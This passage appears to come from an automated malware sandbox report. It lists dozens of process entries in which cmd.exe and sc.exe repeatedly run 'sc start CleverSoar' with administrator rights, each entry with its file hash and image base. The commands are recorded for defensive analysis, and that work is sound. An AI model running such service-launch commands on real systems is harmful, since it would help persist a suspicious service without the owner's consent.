                          Has exited:true

                          General

                          Target ID:40
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:41
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:42
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:43
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:44
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:45
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:46
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:47
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:48
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:49
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:50
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:51
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:52
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:53
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:54
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:55
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:56
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:57
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:58
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:59
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:60
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:61
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:62
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:63
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:64
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:65
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:66
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:67
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:68
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:69
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:70
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:71
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:72
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff70f330000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:73
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:74
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:75
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:76
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:77
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:78
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:79
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:80
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:81
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:82
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:83
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:84
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:85
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:86
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:87
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:88
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:89
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:90
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:91
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:92
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6c7c30000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:93
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:94
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:95
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff72bec0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:96
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:97
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:98
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:99
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:100
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:101
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:103
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:104
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:105
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:106
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:107
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:741
                            Total number of Limit Nodes:9
